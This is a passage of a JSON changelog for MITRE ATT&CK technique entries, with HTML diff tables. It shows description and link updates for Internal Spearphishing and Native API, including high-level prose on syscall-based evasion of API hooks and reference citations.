nowrap=\"nowrap\">&nbsp;the&nbsp;environment,&nbsp;adversaries&nbsp;may&nbsp;use&nbsp;internal&nbsp;spearphishing</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;the&nbsp;environment,&nbsp;adversaries&nbsp;may&nbsp;use&nbsp;internal&nbsp;spearphishing</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;to&nbsp;gain&nbsp;access&nbsp;to&nbsp;additional&nbsp;information&nbsp;or&nbsp;compromise&nbsp;othe</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;to&nbsp;gain&nbsp;access&nbsp;to&nbsp;additional&nbsp;information&nbsp;or&nbsp;compromise&nbsp;othe</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">r&nbsp;users&nbsp;within&nbsp;the&nbsp;same&nbsp;organization.&nbsp;Internal&nbsp;spearphishing</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">r&nbsp;users&nbsp;within&nbsp;the&nbsp;same&nbsp;organization.&nbsp;Internal&nbsp;spearphishing</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;is&nbsp;multi-staged&nbsp;campaign&nbsp;where&nbsp;a&nbsp;legitimate&nbsp;account&nbsp;is&nbsp;init</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;is&nbsp;multi-staged&nbsp;campaign&nbsp;where&nbsp;a&nbsp;legitimate&nbsp;account&nbsp;is&nbsp;init</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ially&nbsp;compromised&nbsp;either&nbsp;by&nbsp;controlling&nbsp;the&nbsp;user's&nbsp;device&nbsp;or</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ially&nbsp;compromised&nbsp;either&nbsp;by&nbsp;controlling&nbsp;the&nbsp;user's&nbsp;device&nbsp;or</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;by&nbsp;compromising&nbsp;the&nbsp;account&nbsp;credentials&nbsp;of&nbsp;the&nbsp;user.&nbsp;Advers</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;by&nbsp;compromising&nbsp;the&nbsp;account&nbsp;credentials&nbsp;of&nbsp;the&nbsp;user.&nbsp;Advers</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">aries&nbsp;may&nbsp;then&nbsp;attempt&nbsp;to&nbsp;take&nbsp;advantage&nbsp;of&nbsp;the&nbsp;trusted&nbsp;inte</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">aries&nbsp;may&nbsp;then&nbsp;attempt&nbsp;to&nbsp;take&nbsp;advantage&nbsp;of&nbsp;the&nbsp;trusted&nbsp;inte</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">rnal&nbsp;account&nbsp;to&nbsp;increase&nbsp;the&nbsp;likelihood&nbsp;of&nbsp;tricking&nbsp;more&nbsp;vic</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">rnal&nbsp;account&nbsp;to&nbsp;increase&nbsp;the&nbsp;likelihood&nbsp;of&nbsp;tricking&nbsp;more&nbsp;vic</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">tims&nbsp;into&nbsp;falling&nbsp;for&nbsp;phish&nbsp;attempts,&nbsp;often&nbsp;incorporating&nbsp;[I</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">tims&nbsp;into&nbsp;falling&nbsp;for&nbsp;phish&nbsp;attempts,&nbsp;often&nbsp;incorporating&nbsp;[I</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">mpersonation](https://attack.mitre.org/techniques/T16<span class=\"diff_chg\">56</span>).(Ci</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">mpersonation](https://attack.mitre.org/techniques/T16<span class=\"diff_chg\">84/001</span>)</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">tation:&nbsp;Trend&nbsp;Micro&nbsp;-&nbsp;Int&nbsp;SP)&nbsp;&nbsp;For&nbsp;example,&nbsp;adversaries&nbsp;may&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">.(Citation:&nbsp;Trend&nbsp;Micro&nbsp;-&nbsp;Int&nbsp;SP)&nbsp;&nbsp;For&nbsp;example,&nbsp;adversaries&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">leverage&nbsp;[Spearphishing&nbsp;Attachment](https://attack.mitre.org</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">may&nbsp;leverage&nbsp;[Spearphishing&nbsp;Attachment](https://attack.mitre</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">/techniques/T1566/001)&nbsp;or&nbsp;[Spearphishing&nbsp;Link](https://attac</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">.org/techniques/T1566/001)&nbsp;or&nbsp;[Spearphishing&nbsp;Link](https://a</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">k.mitre.org/techniques/T1566/002)&nbsp;as&nbsp;part&nbsp;of&nbsp;internal&nbsp;spearp</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ttack.mitre.org/techniques/T1566/002)&nbsp;as&nbsp;part&nbsp;of&nbsp;internal&nbsp;sp</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">hishing&nbsp;to&nbsp;deliver&nbsp;a&nbsp;payload&nbsp;or&nbsp;redirect&nbsp;to&nbsp;an&nbsp;external&nbsp;site</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">earphishing&nbsp;to&nbsp;deliver&nbsp;a&nbsp;payload&nbsp;or&nbsp;redirect&nbsp;to&nbsp;an&nbsp;external&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;to&nbsp;capture&nbsp;credentials&nbsp;through&nbsp;[Input&nbsp;Capture](https://atta</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">site&nbsp;to&nbsp;capture&nbsp;credentials&nbsp;through&nbsp;[Input&nbsp;Capture](https://</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ck.mitre.org/techniques/T1056)&nbsp;on&nbsp;sites&nbsp;that&nbsp;mimic&nbsp;login&nbsp;int</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">attack.mitre.org/techniques/T1056)&nbsp;on&nbsp;sites&nbsp;that&nbsp;mimic&nbsp;login</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">erfaces.&nbsp;&nbsp;Adversaries&nbsp;may&nbsp;also&nbsp;leverage&nbsp;internal&nbsp;chat&nbsp;apps,&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;interfaces.&nbsp;&nbsp;Adversaries&nbsp;may&nbsp;also&nbsp;leverage&nbsp;internal&nbsp;chat&nbsp;ap</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">such&nbsp;as&nbsp;Microsoft&nbsp;Teams,&nbsp;to&nbsp;spread&nbsp;malicious&nbsp;content&nbsp;or&nbsp;enga</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ps,&nbsp;such&nbsp;as&nbsp;Microsoft&nbsp;Teams,&nbsp;to&nbsp;spread&nbsp;malicious&nbsp;content&nbsp;or&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ge&nbsp;users&nbsp;in&nbsp;attempts&nbsp;to&nbsp;capture&nbsp;sensitive&nbsp;information&nbsp;and/or</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">engage&nbsp;users&nbsp;in&nbsp;attempts&nbsp;to&nbsp;capture&nbsp;sensitive&nbsp;information&nbsp;an</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;credentials.(Citation:&nbsp;Int&nbsp;SP&nbsp;-&nbsp;chat&nbsp;apps)</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">d/or&nbsp;credentials.(Citation:&nbsp;Int&nbsp;SP&nbsp;-&nbsp;chat&nbsp;apps)</td></tr>\n        </tbody>\n    </table>",
                    "changelog_mitigations": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0054: Internal Spearphishing via Trusted Accounts"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--391d824f-0ef1-47a0-b0ee-c59a75e27670",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2017-05-31 21:31:17.472000+00:00",
                    "modified": "2026-04-16 19:16:22.540000+00:00",
                    "name": "Native API",
                    "description": "Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.(Citation: NT API Windows)(Citation: Linux Kernel API) These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.\n\nAdversaries may abuse these OS API functions as a means of executing behaviors. Similar to [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), the native API and its hierarchy of interfaces provide mechanisms to interact with and utilize various components of a victimized system.\n\nNative API functions (such as <code>NtCreateProcess</code>) may be directed invoked via system calls / syscalls, but these features are also often exposed to user-mode applications via interfaces and libraries.(Citation: OutFlank System Calls)(Citation: CyberBit System Calls)(Citation: MDSec System Calls) For example, functions such as the Windows API <code>CreateProcess()</code> or GNU <code>fork()</code> will allow programs and scripts to start other processes.(Citation: Microsoft CreateProcess)(Citation: GNU Fork) This may allow API callers to execute a binary, run a CLI command, load modules, etc. as thousands of similar API functions exist for various system operations.(Citation: Microsoft Win32)(Citation: LIBC)(Citation: GLIBC)\n\nHigher level software frameworks, such as Microsoft .NET and macOS Cocoa, are also available to interact with native APIs. These frameworks typically provide language wrappers/abstractions to API functionalities and are designed for ease-of-use/portability of code.(Citation: Microsoft NET)(Citation: Apple Core Services)(Citation: MACOS Cocoa)(Citation: macOS Foundation)\n\nAdversaries may use assembly to directly or in-directly invoke syscalls in an attempt to subvert defensive sensors and detection signatures such as user mode API-hooks.(Citation: Redops Syscalls) Adversaries may also attempt to tamper with sensors and defensive tools associated with API monitoring, such as unhooking monitored functions via [Disable or Modify Tools](https://attack.mitre.org/techniques/T1685).",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "execution"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1106",
                            "external_id": "T1106"
                        },
                        {
                            "source_name": "MACOS Cocoa",
                            "description": "Apple. (2015, September 16). Cocoa Application Layer. Retrieved June 25, 2020.",
                            "url": "https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/OSX_Technology_Overview/CocoaApplicationLayer/CocoaApplicationLayer.html#//apple_ref/doc/uid/TP40001067-CH274-SW1"
                        },
                        {
                            "source_name": "Apple Core Services",
                            "description": "Apple. (n.d.). Core Services. Retrieved June 25, 2020.",
                            "url": "https://developer.apple.com/documentation/coreservices"
                        },
                        {
                            "source_name": "macOS Foundation",
                            "description": "Apple. (n.d.). Foundation. Retrieved July 1, 2020.",
                            "url": "https://developer.apple.com/documentation/foundation"
                        },
                        {
                            "source_name": "OutFlank System Calls",
                            "description": "de Plaa, C. (2019, June 19). Red Team Tactics: Combining Direct System Calls and sRDI to bypass AV/EDR. Retrieved September 29, 2021.",
                            "url": "https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/"
                        },
                        {
                            "source_name": "Redops Syscalls",
                            "description": "Feichter, D. (2023, June 30). Direct Syscalls vs Indirect Syscalls. Retrieved September 27, 2023.",
                            "url": "https://redops.at/en/blog/direct-syscalls-vs-indirect-syscalls"
                        },
                        {
                            "source_name": "GNU Fork",
                            "description": "Free Software Foundation, Inc.. (2020, June 18). Creating a Process. Retrieved June 25, 2020.",
                            "url": "https://www.gnu.org/software/libc/manual/html_node/Creating-a-Process.html"
                        },
                        {
                            "source_name": "CyberBit System Calls",
                            "description": "Gavriel, H. (2018, November 27). Malware Mitigation when Direct System Calls are Used. Retrieved September 29, 2021.",
                            "url": "https://www.cyberbit.com/blog/endpoint-security/malware-mitigation-when-direct-system-calls-are-used/"
                        },
                        {
                            "source_name": "GLIBC",
                            "description": "glibc developer community. (2020, February 1). The GNU C Library (glibc). Retrieved June 25, 2020.",
                            "url": "https://www.gnu.org/software/libc/"
                        },
                        {
                            "source_name": "LIBC",
                            "description": "Kerrisk, M. (2016, December 12). libc(7) \u2014 Linux manual page. Retrieved June 25, 2020.",
                            "url": "https://man7.org/linux/man-pages//man7/libc.7.html"
                        },
                        {
                            "source_name": "Linux Kernel API",
                            "description": "Linux Kernel Organization, Inc. (n.d.). The Linux Kernel API. Retrieved June 25, 2020.",
                            "url": "https://www.kernel.org/doc/html/v4.12/core-api/kernel-api.html"
                        },
                        {
                            "source_name": "MDSec System Calls",
                            "description": "MDSec Research. (2020, December). Bypassing User-Mode Hooks and Direct Invocation of System Calls for Red Teams. Retrieved September 29, 2021.",
                            "url": "https://www.mdsec.co.uk/2020/12/bypassing-user-mode-hooks-and-direct-invocation-of-system-calls-for-red-teams/"
                        },
                        {
                            "source_name": "Microsoft CreateProcess",
                            "description": "Microsoft. (n.d.). CreateProcess function. Retrieved September 12, 2024.",
                            "url": "https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessa"
                        },
                        {
                            "source_name": "Microsoft Win32",
                            "description": "Microsoft. (n.d.). Programming reference for the Win32 API. Retrieved March 15, 2020.",
                            "url": "https://docs.microsoft.com/en-us/windows/win32/api/"
                        },
                        {
                            "source_name": "Microsoft NET",
                            "description": "Microsoft. (n.d.). What is .NET Framework?. Retrieved March 15, 2020.",
                            "url": "https://dotnet.microsoft.com/learn/dotnet/what-is-dotnet-framework"
                        },
                        {
                            "source_name": "NT API Windows",
                            "description": "The NTinterlnals.net team. (n.d.). Nowak, T. Retrieved June 25, 2020.",
                            "url": "https://undocumented.ntinternals.net/"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Gordon Long, LegioX/Zoom, asaurusrex",
                        "Stefan Kanthak",
                        "Tristan Madani (Cybereason)"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": false,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Linux",
                        "macOS",
                        "Windows"
                    ],
                    "x_mitre_remote_support": false,
                    "x_mitre_version": "2.3",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-16 19:16:22.540000+00:00\", \"old_value\": \"2025-10-24 17:48:39.785000+00:00\"}, \"root['description']\": {\"new_value\": \"Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.(Citation: NT API Windows)(Citation: Linux Kernel API) These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.\\n\\nAdversaries may abuse these OS API functions as a means of executing behaviors. Similar to [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), the native API and its hierarchy of interfaces provide mechanisms to interact with and utilize various components of a victimized system.\\n\\nNative API functions (such as <code>NtCreateProcess</code>) may be directed invoked via system calls / syscalls, but these features are also often exposed to user-mode applications via interfaces and libraries.(Citation: OutFlank System Calls)(Citation: CyberBit System Calls)(Citation: MDSec System Calls) For example, functions such as the Windows API <code>CreateProcess()</code> or GNU <code>fork()</code> will allow programs and scripts to start other processes.(Citation: Microsoft CreateProcess)(Citation: GNU Fork) This may allow API callers to execute a binary, run a CLI command, load modules, etc. as thousands of similar API functions exist for various system operations.(Citation: Microsoft Win32)(Citation: LIBC)(Citation: GLIBC)\\n\\nHigher level software frameworks, such as Microsoft .NET and macOS Cocoa, are also available to interact with native APIs. These frameworks typically provide language wrappers/abstractions to API functionalities and are designed for ease-of-use/portability of code.(Citation: Microsoft NET)(Citation: Apple Core Services)(Citation: MACOS Cocoa)(Citation: macOS Foundation)\\n\\nAdversaries may use assembly to directly or in-directly invoke syscalls in an attempt to subvert defensive sensors and detection signatures such as user mode API-hooks.(Citation: Redops Syscalls) Adversaries may also attempt to tamper with sensors and defensive tools associated with API monitoring, such as unhooking monitored functions via [Disable or Modify Tools](https://attack.mitre.org/techniques/T1685).\", \"old_value\": \"Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.(Citation: NT API Windows)(Citation: Linux Kernel API) These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.\\n\\nAdversaries may abuse these OS API functions as a means of executing behaviors. Similar to [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), the native API and its hierarchy of interfaces provide mechanisms to interact with and utilize various components of a victimized system.\\n\\nNative API functions (such as <code>NtCreateProcess</code>) may be directed invoked via system calls / syscalls, but these features are also often exposed to user-mode applications via interfaces and libraries.(Citation: OutFlank System Calls)(Citation: CyberBit System Calls)(Citation: MDSec System Calls) For example, functions such as the Windows API <code>CreateProcess()</code> or GNU <code>fork()</code> will allow programs and scripts to start other processes.(Citation: Microsoft CreateProcess)(Citation: GNU Fork) This may allow API callers to execute a binary, run a CLI command, load modules, etc. as thousands of similar API functions exist for various system operations.(Citation: Microsoft Win32)(Citation: LIBC)(Citation: GLIBC)\\n\\nHigher level software frameworks, such as Microsoft .NET and macOS Cocoa, are also available to interact with native APIs. These frameworks typically provide language wrappers/abstractions to API functionalities and are designed for ease-of-use/portability of code.(Citation: Microsoft NET)(Citation: Apple Core Services)(Citation: MACOS Cocoa)(Citation: macOS Foundation)\\n\\nAdversaries may use assembly to directly or in-directly invoke syscalls in an attempt to subvert defensive sensors and detection signatures such as user mode API-hooks.(Citation: Redops Syscalls) Adversaries may also attempt to tamper with sensors and defensive tools associated with API monitoring, such as unhooking monitored functions via [Disable or Modify Tools](https://attack.mitre.org/techniques/T1562/001).\", \"diff\": \"--- \\n+++ \\n@@ -6,4 +6,4 @@\\n \\n Higher level software frameworks, such as Microsoft .NET and macOS Cocoa, are also available to interact with native APIs. These frameworks typically provide language wrappers/abstractions to API functionalities and are designed for ease-of-use/portability of code.(Citation: Microsoft NET)(Citation: Apple Core Services)(Citation: MACOS Cocoa)(Citation: macOS Foundation)\\n \\n-Adversaries may use assembly to directly or in-directly invoke syscalls in an attempt to subvert defensive sensors and detection signatures such as user mode API-hooks.(Citation: Redops Syscalls) Adversaries may also attempt to tamper with sensors and defensive tools associated with API monitoring, such as unhooking monitored functions via [Disable or Modify Tools](https://attack.mitre.org/techniques/T1562/001).\\n+Adversaries may use assembly to directly or in-directly invoke syscalls in an attempt to subvert defensive sensors and detection signatures such as user mode API-hooks.(Citation: Redops Syscalls) Adversaries may also attempt to tamper with sensors and defensive tools associated with API monitoring, such as unhooking monitored functions via [Disable or Modify Tools](https://attack.mitre.org/techniques/T1685).\"}}}",
                    "previous_version": "2.3",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to24__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to24__0\"><a href=\"#difflib_chg_to24__top\">t</a></td><td class=\"diff_header\" id=\"from24_1\">1</td><td nowrap=\"nowrap\">Adversaries&nbsp;may&nbsp;interact&nbsp;with&nbsp;the&nbsp;native&nbsp;OS&nbsp;application&nbsp;prog</td><td class=\"diff_next\"><a href=\"#difflib_chg_to24__top\">t</a></td><td class=\"diff_header\" id=\"to24_1\">1</td><td nowrap=\"nowrap\">Adversaries&nbsp;may&nbsp;interact&nbsp;with&nbsp;the&nbsp;native&nbsp;OS&nbsp;application&nbsp;prog</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ramming&nbsp;interface&nbsp;(API)&nbsp;to&nbsp;execute&nbsp;behaviors.&nbsp;Native&nbsp;APIs&nbsp;pr</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ramming&nbsp;interface&nbsp;(API)&nbsp;to&nbsp;execute&nbsp;behaviors.&nbsp;Native&nbsp;APIs&nbsp;pr</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ovide&nbsp;a&nbsp;controlled&nbsp;means&nbsp;of&nbsp;calling&nbsp;low-level&nbsp;OS&nbsp;services&nbsp;wi</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ovide&nbsp;a&nbsp;controlled&nbsp;means&nbsp;of&nbsp;calling&nbsp;low-level&nbsp;OS&nbsp;services&nbsp;wi</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">thin&nbsp;the&nbsp;kernel,&nbsp;such&nbsp;as&nbsp;those&nbsp;involving&nbsp;hardware/devices,&nbsp;m</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">thin&nbsp;the&nbsp;kernel,&nbsp;such&nbsp;as&nbsp;those&nbsp;involving&nbsp;hardware/devices,&nbsp;m</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">emory,&nbsp;and&nbsp;processes.(Citation:&nbsp;NT&nbsp;API&nbsp;Windows)(Citation:&nbsp;Li</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">emory,&nbsp;and&nbsp;processes.(Citation:&nbsp;NT&nbsp;API&nbsp;Windows)(Citation:&nbsp;Li</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">nux&nbsp;Kernel&nbsp;API)&nbsp;These&nbsp;native&nbsp;APIs&nbsp;are&nbsp;leveraged&nbsp;by&nbsp;the&nbsp;OS&nbsp;du</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">nux&nbsp;Kernel&nbsp;API)&nbsp;These&nbsp;native&nbsp;APIs&nbsp;are&nbsp;leveraged&nbsp;by&nbsp;the&nbsp;OS&nbsp;du</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ring&nbsp;system&nbsp;boot&nbsp;(when&nbsp;other&nbsp;system&nbsp;components&nbsp;are&nbsp;not&nbsp;yet&nbsp;i</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ring&nbsp;system&nbsp;boot&nbsp;(when&nbsp;other&nbsp;system&nbsp;components&nbsp;are&nbsp;not&nbsp;yet&nbsp;i</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">nitialized)&nbsp;as&nbsp;well&nbsp;as&nbsp;carrying&nbsp;out&nbsp;tasks&nbsp;and&nbsp;requests&nbsp;durin</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">nitialized)&nbsp;as&nbsp;well&nbsp;as&nbsp;carrying&nbsp;out&nbsp;tasks&nbsp;and&nbsp;requests&nbsp;durin</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">g&nbsp;routine&nbsp;operations.&nbsp;&nbsp;Adversaries&nbsp;may&nbsp;abuse&nbsp;these&nbsp;OS&nbsp;API&nbsp;fu</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">g&nbsp;routine&nbsp;operations.&nbsp;&nbsp;Adversaries&nbsp;may&nbsp;abuse&nbsp;these&nbsp;OS&nbsp;API&nbsp;fu</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">nctions&nbsp;as&nbsp;a&nbsp;means&nbsp;of&nbsp;executing&nbsp;behaviors.&nbsp;Similar&nbsp;to&nbsp;[Comma</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">nctions&nbsp;as&nbsp;a&nbsp;means&nbsp;of&nbsp;executing&nbsp;behaviors.&nbsp;Similar&nbsp;to&nbsp;[Comma</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">nd&nbsp;and&nbsp;Scripting&nbsp;Interpreter](https://attack.mitre.org/techn</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">nd&nbsp;and&nbsp;Scripting&nbsp;Interpreter](https://attack.mitre.org/techn</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">iques/T1059),&nbsp;the&nbsp;native&nbsp;API&nbsp;and&nbsp;its&nbsp;hierarchy&nbsp;of&nbsp;interfaces</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">iques/T1059),&nbsp;the&nbsp;native&nbsp;API&nbsp;and&nbsp;its&nbsp;hierarchy&nbsp;of&nbsp;interfaces</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;provide&nbsp;mechanisms&nbsp;to&nbsp;interact&nbsp;with&nbsp;and&nbsp;utilize&nbsp;various&nbsp;com</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;provide&nbsp;mechanisms&nbsp;to&nbsp;interact&nbsp;with&nbsp;and&nbsp;utilize&nbsp;various&nbsp;com</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ponents&nbsp;of&nbsp;a&nbsp;victimized&nbsp;system.&nbsp;&nbsp;Native&nbsp;API&nbsp;functions&nbsp;(such&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ponents&nbsp;of&nbsp;a&nbsp;victimized&nbsp;system.&nbsp;&nbsp;Native&nbsp;API&nbsp;functions&nbsp;(such&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">as&nbsp;&lt;code&gt;NtCreateProcess&lt;/code&gt;)&nbsp;may&nbsp;be&nbsp;directed&nbsp;invoked&nbsp;via</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">as&nbsp;&lt;code&gt;NtCreateProcess&lt;/code&gt;)&nbsp;may&nbsp;be&nbsp;directed&nbsp;invoked&nbsp;via</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;system&nbsp;calls&nbsp;/&nbsp;syscalls,&nbsp;but&nbsp;these&nbsp;features&nbsp;are&nbsp;also&nbsp;often&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;system&nbsp;calls&nbsp;/&nbsp;syscalls,&nbsp;but&nbsp;these&nbsp;features&nbsp;are&nbsp;also&nbsp;often&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">exposed&nbsp;to&nbsp;user-mode&nbsp;applications&nbsp;via&nbsp;interfaces&nbsp;and&nbsp;librari</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td 